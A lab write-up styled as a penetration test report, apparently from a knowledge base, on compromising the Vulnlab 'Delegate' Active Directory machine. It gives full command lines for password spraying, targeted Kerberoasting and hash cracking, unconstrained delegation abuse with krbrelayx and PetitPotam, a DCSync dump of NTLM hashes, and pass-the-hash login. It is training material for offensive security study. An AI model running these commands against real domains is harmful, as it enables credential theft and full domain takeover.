Malleum Knowledge Base

Penetration Testing Report - Delegate

7 min read

Detailed Findings and Recommendations

Delegate is a medium difficulty machine on Vulnlab involving the enumeration of SMB shares to discover user credentials. These credentials were used to exploit a user with GenericWrite over another user object, which was abused through Targeted Kerberoasting. Leveraging the SeEnableDelegation privilege led to an Unconstrained Delegation attack, culminating in performing DCsync to obtain domain controller access.

Machine IDIPDomainDC
Delegate10.10.89.126delegate.vldc.sendai.vl

Phase 1: Enumeration

Port Scanning

sudo nmap -sC -sV -oA delegate 10.10.89.126
  • -sC: Runs default Nmap scripts.
  • -sV: Detects service versions.
  • -oA: Outputs in all formats (normal, XML, and grepable) and saves with the prefix delegate.
PortServiceVersion
53domainSimple DNS Plus
88kerberos-secMicrosoft Windows Kerberos
135msrpcMicrosoft Windows RPC
139netbios-ssnMicrosoft Windows netbios-ssn
389ldapMicrosoft Windows Active Directory LDAP
445microsoft-ds?
464kpasswd5?
593ncacn_httpMicrosoft Windows RPC over HTTP 1.0
636tcpwrapped
3268ldapMicrosoft Windows Active Directory LDAP
3269tcpwrapped
3389ms-wbt-serverMicrosoft Terminal Services

- DNS_Domain_Name: delegate.vl

- Product_Version: 10.0.20348

- DNS_Computer_Name: DC1.delegate.vl

- NetBIOS_Computer_Name: DC1


- NetBIOS_Domain_Name: DELEGATE

Editing /etc/hosts

Add the following entry to /etc/hosts

10.10.89.126 dc1.delegate.vl delegate.vl

SMB Enumeration (Port 445)

cme smb 10.10.89.126 -u 'guest' -p '' --shares
  • cme smb: CrackMapExec module for SMB enumeration.
  • -u 'guest' -p '': Using the guest account with an empty password.
  • --shares: Lists shared resources.

Share Access{width=70% }

As we can see, the guest user has read access to a few shares on the DC. The next logical step is to determine if these readable shares contain useful information that can help us identify a way to gain initial access to the system.

smbclient.py 'guest@10.10.89.126'
  • smbclient.py: A tool to interact with SMB shares.
  • guest@10.10.103.222: Connect using the guest account.

On the SYSVOL\delegate.vl\scripts\ share we found a users.bat file.

rem @echo off
net use * /delete /y
net use v: \\dc1\development 
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
  • The batch file first deletes all existing network connections.
  • It then maps the network share \\dc1\development to the v: drive.
  • If the current user is A.Briggs, it additionally maps the network share \\fileserver\backups to the h: drive using the Administrator credentials.

So our current enumeration gives us some valuable information:

  • The script could be an auto-logon script which is executed, whenever a user logs in to the domain controller and maps a share \\dc\development to v: and also check if the user is A.Briggs, if yes then it also maps \\fileserver\backups share by supplying Administrator credentials.

Enumerating more with the guest access, we try to perform rid bruteforce to obtain list of all available users.

cme smb 10.10.89.126 -u 'guest' -p '' --rid-brute

Usernames obtained through RID Bruteforce

Based on the enumeration, we have so far a list of users and one single password credential.

UsernamePassword
AdministratorP4ssw0rd1#123
A.Briggs
b.Brown
R.Copper
J.Roberts
N.Thompson

we now create users.txt and a passwords.txt files, which we can use to perform password spraying attack.

cme smb 10.10.89.126 -u 'users.txt' -p 'users.txt' --no-bruteforce --continue-on-success

We start by password spraying using username:username format.This gave us one successful login attempt for user R.Copper.

Successful_Login_R.Copper

cme smb 10.10.89.126 -u 'users.txt' -p 'passwords.txt' --continue-on-success

We then move to password spraying using username:password format.This gave us two successful login attempts. One is for the user A.Briggs and second again for the user R.Copper. This leads me to believe that the user R.Copper likely has a misconfigured or default setup, allowing any password to be used for login. This could be a temporary account with relaxed security policies.

Succesful_Login for user A.Briggs

Sucessful_Login for user R.Copper

To check our previous assumption that R.Copper can be a misconfigured or a temporary account. We again password spray using empty password for the users.

cme smb 10.10.89.126 -u 'users.txt' -p '' --continue-on-success

And indeed user R.Copper accepts any passwords supplied to it.

Succesful_Login for user R.Copper

So we now have following list of usernames and passwords.

UsernamePasswordLogin Status
AdministratorP4ssw0rd1#123False
A.BriggsP4ssw0rd1#123True
b.BrownFalse
R.Copper(guest account)True
J.RobertsFalse
N.ThompsonFalse

Now we the A.Briggs user we try to enumerate the SMB shares.

cme smb 10.10.89.126 -u 'A.Briggs' -p 'P4ssw0rd1#123' --shares

Based on the results user A.Briggs has the same access on the shares as a guest user.

Share Access for A.Briggs{width:70%}

We are now not able to extract more information through SMB share. We will focus now on LDAP enumeration.

LDAP - Port 389 Enumeration

Bloodhound Scan

We start by running bloodhound scan using cme.

cme ldap 10.10.89.126 -u 'A.Briggs' -p 'P4ssw0rd1#123' --bloodhound -c All -ns 10.10.89.126

Now we upload the zip file created from the above command into bloodhound and try to find an attack path.

In bloodhound we find a path to get a initial shell access to the DC1.DELEGATE.VL.

Attack Path for Initial Access

Resource Development

  • Based on our enumeration we have obtained an attack path to PSRemote into DC1.DELEGATE.VL using N.THOMPSON@DELEGATE.VL account.

  • We have control over A.BRIGGS@DELEGATE.VL , whose credentials we obtained during enumeration phase.

  • A.BRIGGS has a GenericWrite access over user N.THOMPSON.

To PSRemote to DC1.DELEGATE.VL using N.THOMPSON account we can use Targeted Kerberoasting

Targeted Kerberoasting

  • This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target.
  • The attacker can add an SPN (ServicePrincipalName) to that account.
  • Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting.

To perform this attack from a Linux system we need targetedKerberoast.py script.

targetedKerberoast.py -v -d $DOMAIN_FQDN -u $USER -p $PASSWORD

Initial Access

Targeted Kerberoasting

In our resource development section we downloaded the targetedKerberoast.py script. Now we will use this script to get the hash for N.THOMPSON account and try to crack it offline using hashcat. We will then use the cracked password to PSRemote into the DC1.

python3 ./targetedKerberoast.py -v -d Delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123'

Running this command we obtained the hash for N.THOMPSON user.

$krb5tgs$23$*N.Thompson$DELEGATE.VL$Delegate.vl/N.Thompson*$a79b8e0f02615db8c7369c34e47a10ee$93a6e903161c3086034706f6290e1ef33117eb335921a7fa9a472c84b1deed872b17b1de51b1f5e217de60e67021523a77e9265f66bf3413d5840ba5b3456bd696bf07448d902a0744bcf88011681c5970be6c27cecb2276cb74617afbb64a31ab7bfd09fe0cfb99f2010af08e547ade2d0e8e9010a12d82ad01784bf7cbf4e3e8baae6a8c155221de6cc06e62932d8ee508c75a0ad357e567c09e9f3771ec96a980dccbcf8b15efa8ce7a39716e67ff98a37dd3e5fc869ecb03f98681afdcd02c9f0c2ba0b716a5fcafbde1ef8cd679db3bc4f2adc940391329cba97b3c0c9b44e8500a93a089a0d78a56deb5398c73163013a67d29aeebad0b9871babd645e7cee3caeb926a3be67617df22eefbb7c6ab1bb0d81cf983d178a22e64c85df4745da8d25348e8ac4f36c937cd2a32b6057171bfbd842121769323f48e782444d0abbdf4f6cb22b7a428ca91a94a18bcb593a718ea225ac4bf631564f5c21e349ec8f3ef7809c3608564bde46c101db1f21da7bb597e96d136b2b67f3f8dfd43c7a80494991d2d753239d38287b91fd61e9219a5618b5d5ef5b376fee6dd97aa5e16483b1b34d194ba644e1036862645dddadf9fe6691c302f207974cf8aca7f2dfcdca3e9c1d97f3177e04ff547f32d0951ad984ae4e69aab2c499ce34ab6dfa7e80be317ffdc598a10df44c066d020ea9d74c3c1c232ee91ba423281479b2de973de0e8d740b0c3b112f267ef967af4689e0e1b19267e82c78bc67465d43c9606f658f584abaac3593d551d452e6a31e1146388aabacf42fb88ee5106061057c81bb10bb05d1a04c172c00ed2d515ac578061260a19c282ac65b4e1736fbdea716aafad14a83856473a2a7b1b99c91f19432da1654e431a6a9cc13bde5cef566680034adaf3dbfb922906a6f77ed95eac45a80edaa5c274ce718c061864fa601c4962aa98d4ec73d4ed2631fabd9208a7d945cb1d512955fe2a993e686f0f636af69a933d1ec49ac40b6a3377b57d4eb47b84e8fb19c9cc2ccb940ec4efac6057604c8b598f01e94aad55ec334f712c3b651d92192dc8b49c1074e305918421163dd394ceba5863ba42833024c381146f084496109f41fae9692bf1cb3a5b921d7db68ce6e6323d927b4e24c908174df84d7fd4582a088cdac78e4cb0dc5d28b217e885687691574393bfe41d2804cc11488daf658f76b312b510baa28d30335863c7414854970f9d51f6ad144256a9e286abc7dd835790dde3d82fc8364b2c79238caf7c4d85830aba7540dce421dc34775d6699c2751df3cf3dda8c0bf05d1dd950a2283f45e8e8a662c44e9ed9d9ca8aa9903f63b3c6816aa0496de006d8e7d8f5566be06a2836d0b04a2ea08996792de942b4cd2edeeed964006624736c9dbb830e0c80ffd15f2d2c6169cc8772a27a6ba1d9a4ccd952b0efe8462848c862112573

We now try to crack the obtained hash using hashcat.

hashcat n.thompson_hash /usr/share/wordlists/rockyou.txt

hashcat was able to successfully crack the password for N.THOMPSON and we obtained KALEB_2341. This shows the misconfiguration in account password policy as the user has weak password and was easily crackable using rockyou.txt word-list. We update out username:password list now as follows.

UsernamePasswordLogin StatusMethod
AdministratorP4ssw0rd1#123FalseEnumeration
A.BriggsP4ssw0rd1#123TrueEnumeration
b.BrownFalseN/A
R.Copper(guest account)TrueEnumeration
J.RobertsFalseN/A
N.ThompsonKALEB_2341TrueTargeted Kerberoasting

Now we use N.Tompson credential to PSRemote in to DC1 using evil-winrm.

evil-winrm -i dc1.delegate.vl -u n.thompson -p 'KALEB_2341'

The screenshot below show our initial shell on dc1.delegate.vl

Initial Shell as N.THOMPSON

Host Reconnaissance

We don’t find any information from bloodhound for user n.thompson other than: N.Thompson Group Membership

Looking at the description of the group Delegation Admins, it show us following information.

Node Properties of Delegation Admins Group

Based on the above information, it is assumed that the user N.Thompson has some kind of delegation rights.

Check the privileges of User

whoami /all

which gives us interesting information and confirms our assumption that user N.Thompson has delegation privilege SeEnableDelegationPrivilege.

Access Tokens for N.Thompson

Based on the above information we get two pieces useful information.

  • User N.Thompson can add a machine account in the domain.
  • User N.Thompson can enable computer and user accounts to be trusted for delegation.

Resource Development for Privilege Escalation

The information from host reconnaissance tells us that we might be able to perform Unconstrained Delegation attack.

  • Delegation allows a user or machine to act on behalf of another user to another service.
  • We can create a machine account and enable delegation privilege on the newly created machine account.
  • When delegation is enabled on a machine account the KDC (Domain Controller)  includes a copy of the user’s TGT inside the TGS when a user tries to access any service on the machine.
  • So, if an admin accesses a file share or any other service on the machine their TGT will be cached.

For more detailed information visit dirkjanman on relaying kerberos. We will also be using a tool bloodyAD to modify the UAC flag on the machine.

Privilege Escalation

To perform the privilege escalation we will follow the attack as show as in the table below.

StepsAction
Step 1Add Machine Account
Step 2Modify DNS records
Step 3Modify UAC
Step 4Add SPN to Machine Account

Adding a machine account

addcomputer.py -dc-ip 10.10.89.113 -computer-pass Password123 -computer-name attacker delegate.vl/N.Thompson:'KALEB_2341'

Added Machine Account

Modifying the dns records

python3 dnstool.py -u 'delegate.vl\attacker$' -p 'Password123' -r attacker.delegate.vl -d 10.8.2.41 --action add 'DC1.delegate.vl' -dns-ip 10.10.89.113

Added DNS Entry

Modifying the UAC

./bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'attacker$' -f TRUSTED_FOR_DELEGATION

UAC modified

Adding SPN to machine account

python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/attacker.delegate.vl' -t 'attacker$' -dc-ip 10.10.89.113 DC1.delegate.vl --additional

python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/attacker.delegate.vl' -t 'attacker$' -dc-ip 10.10.89.113 DC1.delegate.vl

SPN Added Successfully

Converting the password of machine account using cyberchef

Starting Krbrelayx

python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71

Coerce using PetitPotam

python3 PetitPotam.py -u 'attacker$' -p 'Password123' attacker.delegate.vl 10.10.89.113

Setting the Ccache

export KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

DCSync the Domain Controller

secretsdump.py 'DC1$'@DC1.delegate.vl -k -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:dd7e290670e942bd2a7cefa97ba07a5c:::
attacker$:3101:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

Final Access with Evil-WinRM

evil-winrm -i dc1.delegate.vl -u administrator -H 'c32198ceab4cc695e65045562aa3ee93'

Graph View